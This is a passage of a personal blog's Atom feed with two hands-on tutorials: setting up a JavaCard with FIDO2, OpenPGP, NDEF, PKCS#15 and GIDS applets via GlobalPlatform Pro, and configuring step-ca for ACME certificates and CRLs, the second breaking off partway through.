<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>ThinkAlone</title>
<subtitle>In solitude where we are least alone. ----Lord Byron</subtitle>
<link href="https://thinkalone.win/atom.xml" rel="self"/>
<link href="https://thinkalone.win/"/>
<updated>2026-04-01T04:00:00.000Z</updated>
<id>https://thinkalone.win/</id>
<author>
<name>Disappear9</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Getting Started with JavaCard</title>
<link href="https://thinkalone.win/Play-with-JavaCard.html"/>
<id>https://thinkalone.win/Play-with-JavaCard.html</id>
<published>2026-03-01T04:00:00.000Z</published>
<updated>2026-04-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="材料准备"><a href="#材料准备" class="headerlink" title="材料准备"></a>Materials</h3><p>JavaCard (search Taobao for J3R180, ¥20-30; get the SECID version, and remember to ask the seller for the keys)<br>Smart card reader (search Taobao for pcsc reader/ccid reader, ¥30-50; paying extra for a dual-interface one is the better choice, or buy a cheap contact reader plus a better contactless one for daily use) </p><hr><h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>Environment</h3><p>Operating system:<br>  Windows 10 LTSB 21H2<br>Software versions:<br>  gpg4win 5.0.1 (gpg 2.5.17)<br>  OpenSC 0.26.1<br>  Global Platform Pro v20.08.12<br>  Temurin JDK 21.0.10+7-LTS<br>  Python 3.13 </p><span id="more"></span> <h3 id="准备卡片"><a href="#准备卡片" class="headerlink" title="准备卡片"></a>Preparing the card</h3><p>The first thing to do once the card arrives is to change the default keys. </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl rand <span class="literal">-hex</span> <span class="number">16</span> <span class="comment"># Run 3 times to generate three keys, for enc, mac and dek respectively</span></span><br><span class="line"><span class="comment"># !!! Keep them safe; if they are lost, the card can be thrown away !!!</span></span><br></pre></td></tr></table></figure><p>Change the keys:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar `</span><br><span class="line"> <span class="literal">--key-enc</span> old<span class="literal">-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> old<span class="literal">-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> old<span class="literal">-key</span> `</span><br><span class="line"> <span class="literal">--lock-enc</span> <span class="built_in">new-key</span> <span class="literal">--lock-mac</span> <span class="built_in">new-key</span> <span class="literal">--lock-dek</span> <span 
class="built_in">new-key</span></span><br></pre></td></tr></table></figure><h3 id="JCAlgTest"><a href="#JCAlgTest" class="headerlink" title="JCAlgTest"></a>JCAlgTest</h3><p>First, run a test to check whether the card you received works properly and which algorithms it supports.<br>Download the latest release from <a href="https://github.com/crocs-muni/JCAlgTest">JCAlgTest</a> (the current latest is AlgTest_dist_1.8.3.zip).<br>Install the applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> AlgTest_v1.<span class="number">8.2</span>_jc305.cap `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><p>If the jc305 applet cannot be installed, try jc304 -> jc222 in turn.<br>If jc304 cannot be installed either, there is no need to read the rest of this tutorial: it means the chip on the card you bought is most likely not a J3R180, and its JavaCard support version is lower than 3.0.4. </p><p>Run <code>AlgTestJClient</code></p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> AlgTestJClient.jar</span><br></pre></td></tr></table></figure><p>Choose <code>1 -> SUPPORTED ALGORITHMS</code> to test the supported algorithms.<br>The test takes about 5 minutes to run and produces a csv file at the end.<br>Open the csv file and note down <code>CPLC.ICSerialNumber</code>; it is best to write it on the card so that cards are easy to tell apart.<br>Search for <code>TYPE_RSA_PRIVATE LENGTH_RSA_3072</code>; if the value shown after it is no, then when installing the OpenPGP applet or IsoApplet you can only use the one whose file name contains 2048. </p><h3 id="FIDO2"><a href="#FIDO2" class="headerlink" title="FIDO2"></a>FIDO2</h3><p>Download the project ZIP archive from <a href="https://github.com/BryanJacobs/FIDO2Applet">FIDO2Applet</a>, then download the applet (FIDO2.cap) from Releases.<br>Extract the project ZIP archive and keep it at hand; the scripts in the project are needed later. 
</p><p>Note: at present (2026/3/1) GPP must be v20.08.12; later versions have a problem handling TLV that causes the certificate injection step below to fail. </p><p>Install the applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> FIDO2.cap `</span><br><span class="line"> <span class="literal">--params</span> a800f50505061820071904000818200918fe0a1904000b190400 `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><p>Inject the certificate<br>Note: at present (2026/3/1) Python must be 3.12, otherwise pyscard cannot be installed (or patch the code by hand yourself). </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python <span class="literal">-m</span> venv venv</span><br><span class="line">venv\Scripts\Activate.ps1</span><br><span class="line">pip install <span class="literal">-r</span> FIDO2Applet<span class="literal">-main</span>/requirements.txt</span><br><span class="line">python FIDO2Applet<span class="literal">-main</span>/install_attestation_cert.py</span><br></pre></td></tr></table></figure><h3 id="OpenPGP"><a href="#OpenPGP" class="headerlink" title="OpenPGP"></a>OpenPGP</h3><p>Download the applet from <a href="https://github.com/github-af/SmartPGP">SmartPGP</a>.<br>The RSA 2048 or 3072 applet is suggested; NIST P-384 is recommended even more, because running RSA on the card is still too slow. </p><p>Generate a serial number with the following script:</p><figure class="highlight 
python"><figcaption><span>gen_sn.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> secrets</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"><span class="comment"># anything in fff0 to fffe is for unmanaged random assignment of serial numbers</span></span><br><span class="line">_MANUFACTURER = <span class="string">"fff5"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">_make_card</span>():</span><br><span class="line"> <span class="comment"># SN is 8 digits, so 4 bytes shown as hex</span></span><br><span class="line"> sn = secrets.token_hex(<span class="number">4</span>)</span><br><span class="line"> aid = <span class="string">f"d276000124010304<span class="subst">{_MANUFACTURER}</span><span class="subst">{sn}</span>0000"</span></span><br><span class="line"> <span class="built_in">print</span>(<span class="string">f"Assigning serial number <span class="subst">{sn}</span> for manufacturer <span class="subst">{_MANUFACTURER}</span>"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"--create "</span> + aid)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span 
class="string">"__main__"</span>:</span><br><span class="line"> _make_card()</span><br></pre></td></tr></table></figure><p>Install the applet, replacing the value after <code>--create</code> with the one generated by the script above </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> SmartPGPApplet<span class="literal">-rsa_up_to_3072</span>.cap `</span><br><span class="line"> <span class="literal">--create</span> ************************** `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><p>For how to use OpenPGP, see: <a href="https://thinkalone.win/canokey-canary.html#OpenPGP">Getting Started with Canokey Canary#OpenPGP</a></p><h3 id="NDEF"><a href="#NDEF" class="headerlink" title="NDEF"></a>NDEF</h3><p>Download the prebuilt applet from <a href="https://github.com/OpenJavaCard/openjavacard-ndef/tree/master/prebuilt">openjavacard-ndef</a> </p><p>Install the applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> openjavacard<span class="literal">-ndef-full</span>.cap `</span><br><span class="line"> <span class="literal">--params</span> <span class="number">8102000082020800</span> `</span><br><span class="line"> <span 
class="literal">--create</span> D2760000850101 `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><p>This creates a rewritable tag with 2K of storage; for the detailed parameter settings, <a href="https://github.com/OpenJavaCard/openjavacard-ndef/blob/master/doc/install.md">see here</a>.</p><h3 id="PKCS11-15"><a href="#PKCS11-15" class="headerlink" title="PKCS11/15"></a>PKCS11/15</h3><p>This applet has to be compiled yourself: <a href="https://github.com/philipWendland/IsoApplet">IsoApplet</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Switch to Debian to make setting up the environment easier</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/philipWendland/IsoApplet</span><br><span class="line"><span class="built_in">cd</span> IsoApplet</span><br><span class="line">git submodule init</span><br><span class="line">git submodule update</span><br></pre></td></tr></table></figure><p>Edit <code>IsoApplet.java</code> to allow importing private keys </p><figure class="highlight java"><figcaption><span>IsoApplet.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">boolean</span> <span class="variable">DEF_PRIVATE_KEY_IMPORT_ALLOWED</span> <span class="operator">=</span> <span class="literal">true</span>;</span><br></pre></td></tr></table></figure><p>If your card does not support RSA4096, you need to comment out the part of <code>IsoApplet.java</code> 
that tests for RSA4096 </p><figure class="highlight java"><figcaption><span>IsoApplet.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> <span class="comment">// API features: probe card support for 4096 bit RSA keys</span></span><br><span class="line">api_features &= ~API_FEATURE_RSA_4096;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> try {</span></span><br><span class="line"><span class="comment"> RSAPrivateCrtKey testKey = (RSAPrivateCrtKey)KeyBuilder.buildKey(KeyBuilder.TYPE_RSA_CRT_PRIVATE, KeyBuilder.LENGTH_RSA_4096, false);</span></span><br><span class="line"><span class="comment"> api_features |= API_FEATURE_RSA_4096;</span></span><br><span class="line"><span class="comment"> } catch (CryptoException e) {</span></span><br><span class="line"><span class="comment"> if(e.getReason() == CryptoException.NO_SUCH_ALGORITHM) {</span></span><br><span class="line"><span class="comment"> api_features &= ~API_FEATURE_RSA_4096;</span></span><br><span class="line"><span class="comment"> } else {</span></span><br><span class="line"><span class="comment"> throw e;</span></span><br><span class="line"><span class="comment"> }</span></span><br><span class="line"><span class="comment"> }</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>Note: at present (2026/4/1), importing an RSA4096 key into IsoApplet fails. I submitted PRs to both OpenSC and IsoApplet, but the IsoApplet author seems to be planning a refactor and so did not adopt it directly; a fix is still pending.<br><a 
href="https://github.com/philipWendland/IsoApplet/pull/46">Fix RSA4096 import</a><br><a href="https://github.com/OpenSC/OpenSC/pull/3632">Fix IsoApplet hard coded algorithm_ref</a><br>If you need to use RSA4096 keys, either generate them on the card or patch the code by hand following the PRs. </p><p>We start a Docker container so that the build environment does not conflict with the host: </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> docker run -it -v ./IsoApplet:/workdir --name jc_build ubuntu:22.04</span><br><span class="line">apt update</span><br><span class="line">apt install openjdk-8-jdk ant</span><br><span class="line">update-java-alternatives -s java-1.8.0-openjdk-amd64</span><br><span class="line"><span class="built_in">cd</span> /workdir</span><br><span class="line">ant</span><br></pre></td></tr></table></figure><p>The build produces <code>IsoApplet.cap</code><br>Of course, you can also <a href="/attachments/Play-with-JavaCard/IsoApplet.7z">use the cap I have already built</a> </p><p>Install the applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> IsoApplet.cap `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><p>Initialize </p><figure class="highlight 
powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Generate a random 32-character serial number</span></span><br><span class="line">openssl rand <span class="literal">-hex</span> <span class="number">16</span></span><br><span class="line">pkcs15<span class="literal">-init</span> <span class="literal">--create-pkcs15</span> <span class="literal">--serial</span> <span class="number">48</span>c32f6a878b839a</span><br></pre></td></tr></table></figure><p>For a usage example, see: <a href="https://github.com/philipWendland/IsoApplet/wiki/Using-the-IsoApplet-with-OpenSSH">Using-the-IsoApplet-with-OpenSSH</a> </p><h3 id="VeraCrypt"><a href="#VeraCrypt" class="headerlink" title="VeraCrypt"></a>VeraCrypt</h3><p>VeraCrypt can directly use keyfiles stored on a security token or smart card that complies with the PKCS #11 (2.0 or later) standard and allows the user to store a file (data object) on the token/card. <a href="https://veracrypt.jp/zh-cn/Keyfiles%20in%20VeraCrypt.html">See the VeraCrypt documentation for the steps</a></p><p>There are two ways:<br>1. Store it in PrivDO3 (Private Data Object 3) of the OpenPGP applet<br>2. Store it in PKCS #15 of IsoApplet</p><h4 id="PrivDO3"><a href="#PrivDO3" class="headerlink" title="PrivDO3"></a>PrivDO3</h4><p>By default, if you simply follow the VeraCrypt documentation, the keyfile is stored in PrivDO1, and running <code>gpg --card-edit</code> reads it directly without any PIN verification: </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Temp> gpg <span class="literal">--card-edit</span></span><br><span class="line"></span><br><span class="line">Manufacturer .....: unmanaged S/N range</span><br><span class="line">......</span><br><span class="line">Private <span class="keyword">DO</span> <span class="number">1</span> .....: DO1XXXXXXXXXXXXXXXXX <<<<<<<<<<<<<<</span><br><span class="line">Signature PIN 
....: forced</span><br></pre></td></tr></table></figure><p>So this library is the better choice: <a href="https://github.com/czietz/openpgp-privdo3-pkcs11">openpgp-privdo3-pkcs11</a>, which stores the keyfile in DO 3.<br>Download the matching dll/so file from Releases, then follow the project README. </p><h4 id="PKCS"><a href="#PKCS" class="headerlink" title="PKCS"></a>PKCS</h4><p>1. In the VeraCrypt menu bar, click Tools > Keyfile Generator<br>2. Set the keyfile size to between 64 and 256 bytes, generate it and save it<br>3. In the VeraCrypt menu bar, click Tools > Manage Security Token Keyfiles<br>4. Enter the PIN you set to authenticate<br>5. Click "Import Keyfile to Token", then select the file you just generated </p><h3 id="GIDS"><a href="#GIDS" class="headerlink" title="GIDS"></a>GIDS</h3><p>Note: GidsApplet and IsoApplet are mutually exclusive; you can only choose one of the two </p><p>Download the prebuilt applet from <a href="https://github.com/vletoux/GidsApplet/releases">GidsApplet</a> </p><p>Install the applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> GidsApplet.cap `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><p>Initialize </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Generate a random 48-character serial number</span></span><br><span class="line">openssl rand <span class="literal">-hex</span> <span class="number">24</span></span><br><span class="line"><span class="comment"># 
Initialize</span></span><br><span class="line">gids<span class="literal">-tool</span> <span class="literal">-X</span></span><br><span class="line"><span class="comment"># Import the certificate (RSA2048)</span></span><br><span class="line">certutil <span class="literal">-csp</span> <span class="string">"Microsoft Base Smart Card Crypto Provider"</span> <span class="literal">-importpfx</span> <span class="literal">-p</span> <passphrase> <file.p12></span><br><span class="line"><span class="comment"># or</span></span><br><span class="line">pkcs15<span class="literal">-init</span> <span class="literal">--auth-id</span> <span class="number">80</span> <span class="literal">--pin</span> <pin> <span class="literal">--verify-pin</span> <span class="operator">-f</span> PKCS12 <span class="literal">--passphrase</span> <span class="string">"<passphrase>"</span> <span class="literal">-S</span> <file.p12></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h3 id="材料准备"><a href="#材料准备" class="headerlink" title="材料准备"></a>Materials</h3><p>JavaCard (search Taobao for J3R180, ¥20-30; get the SECID version, and remember to ask the seller for the keys)<br>Smart card reader (search Taobao for pcsc reader&#x2F;ccid reader, ¥30-50; paying extra for a dual-interface one is the better choice, or buy a cheap contact reader plus a better contactless one for daily use) </p>
<hr>
<h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>Environment</h3><p>Operating system:<br>&emsp;&emsp;Windows 10 LTSB 21H2<br>Software versions:<br>&emsp;&emsp;gpg4win 5.0.1 (gpg 2.5.17)<br>&emsp;&emsp;OpenSC 0.26.1<br>&emsp;&emsp;Global Platform Pro v20.08.12<br>&emsp;&emsp;Temurin JDK 21.0.10+7-LTS<br>&emsp;&emsp;Python 3.13 </p></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>Jank Rig! Launch! A Day-to-Day Step-CA Tutorial</title>
<link href="https://thinkalone.win/Using-step-ca.html"/>
<id>https://thinkalone.win/Using-step-ca.html</id>
<published>2026-01-09T04:00:00.000Z</published>
<updated>2026-04-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>A few days ago I finally found time to finish the tutorial on building my own jank CA, which I had put off for almost a year: <a href="https://thinkalone.win/build-ca-with-picohsm.html">Building a CA with Pico HSM and step-ca</a><br>Once it is built it has to be put to use and played with, so this post covers some Step-CA usage, and also serves as a reference for myself. </p><hr><span id="more"></span> <h3 id="ACME"><a href="#ACME" class="headerlink" title="ACME"></a>ACME</h3><h4 id="修改默认配置"><a href="#修改默认配置" class="headerlink" title="修改默认配置"></a>Changing the default configuration</h4><p>For security, certificates issued by Step-CA are valid for only 24 hours by default, which is entirely unnecessary for us, so first change it to 7 days </p><p>Edit <code>step-ca/config/ca.json</code> </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"><span class="attr">"type"</span><span class="punctuation">:</span> <span class="string">"ACME"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"name"</span><span class="punctuation">:</span> <span class="string">"acme"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"claims"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"><span class="attr">"maxTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"336h"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"minTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"24h"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"defaultTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"168h"</span></span><br><span class="line"><span 
class="punctuation">}</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>Enable CRL </p><p>Edit <code>step-ca/config/ca.json</code> </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">"insecureAddress"</span><span class="punctuation">:</span> <span class="string">":9001"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"crl"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"idpURL"</span><span class="punctuation">:</span> <span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span></span><br><span class="line"><span class="punctuation">}</span><span class="punctuation">,</span></span><br></pre></td></tr></table></figure><p>Create the template <code>/etc/step-ca/templates/x509/leaf.tpl</code> </p><figure class="highlight json"><figcaption><span>leaf.tpl</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"subject"</span><span class="punctuation">:</span> 
<span class="punctuation">{</span><span class="punctuation">{</span> toJson .Subject <span class="punctuation">}</span><span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"sans"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">{</span> toJson .SANs <span class="punctuation">}</span><span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">{</span><span class="punctuation">{</span>- if typeIs <span class="string">"*rsa.PublicKey"</span> .Insecure.CR.PublicKey <span class="punctuation">}</span><span class="punctuation">}</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"keyEncipherment"</span><span class="punctuation">,</span> <span class="string">"digitalSignature"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">{</span><span class="punctuation">{</span>- else <span class="punctuation">}</span><span class="punctuation">}</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"digitalSignature"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">{</span><span class="punctuation">{</span>- end <span class="punctuation">}</span><span class="punctuation">}</span></span><br><span class="line"> <span class="attr">"extKeyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"serverAuth"</span><span class="punctuation">,</span> <span class="string">"clientAuth"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span 
class="line"> <span class="attr">"crlDistributionPoints"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span><span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>Edit <code>step-ca/config/ca.json</code><br>Configure the acme and JWK provisioners to use the template </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line"> <span class="attr">"claims"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"maxTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"336h"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"minTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"24h"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"defaultTLSCertDuration"</span><span 
class="punctuation">:</span> <span class="string">"168h"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"options"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"x509"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"templateFile"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/templates/x509/leaf.tpl"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"ssh"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">}</span></span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line">......</span><br><span class="line"> <span class="attr">"claims"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enableSSHCA"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"disableRenewal"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"allowRenewalAfterExpiry"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"disableSmallstepExtensions"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br><span class="line"> <span class="punctuation">}</span><span 
class="punctuation">,</span></span><br><span class="line"> <span class="attr">"options"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"x509"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"templateFile"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/templates/x509/leaf.tpl"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"ssh"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">}</span></span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="给设备发SSL证书"><a href="#给设备发SSL证书" class="headerlink" title="给设备发SSL证书"></a>Issuing SSL certificates to devices</h4><p>For other ACME clients, see: <a href="https://smallstep.com/docs/tutorials/acme-protocol-acme-clients/#popular-acme-clients">Popular ACME Clients</a><br>Here we use <a href="https://github.com/acmesh-official/acme.sh">acme.sh</a>, which is small and elegant. </p><p>Suppose I want to issue a certificate for the bypass router (OpenWRT) on my internal network </p><p>Because our self-built CA is not in the system's list of trusted root certificates, curl reports an error if acme.sh is run directly, so we need to copy root_ca.crt to the device. </p><figure class="highlight bash"><table><tr><td 